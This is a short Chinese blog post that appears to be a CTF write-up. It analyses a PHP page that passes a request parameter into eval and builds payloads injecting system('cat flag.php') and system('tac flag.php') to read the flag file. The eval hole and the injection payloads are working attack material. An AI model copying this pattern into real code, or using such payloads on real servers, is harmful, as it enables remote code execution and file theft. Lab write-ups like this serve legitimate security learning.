訪問目標地址,發現一段php代碼
首先做一個簡單的分析
<?php
include "flag.php"; ///include是將flag.php檔案包含進頁面代碼,順便提示了flag位置
$a = @$_REQUEST['hello']; ///$_REQUEST可以用于接受get和post傳遞的引數
eval( "var_dump($a);"); ///eval函式可以把字串當作php命令執行
show_source(__FILE__);
?>
綜上所述,嘗試構建payload:/?hello=system(‘cat flag.php’)
發現結果不太對勁!
經過一番查資料,因為那個php檔案帶有<?php和后面的?>,正序輸出會被網頁當做php代碼運行(結果為空),但是<?php 和?>不在同一行,所以tac反序輸出使其不閉合,才可以顯示其字串的形式
所有構建新的payload:/?hello=system(‘tac flag.php’)
成功得到flag!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/291781.html
標籤:其他
下一篇:vulnhub靶機EVM滲透筆記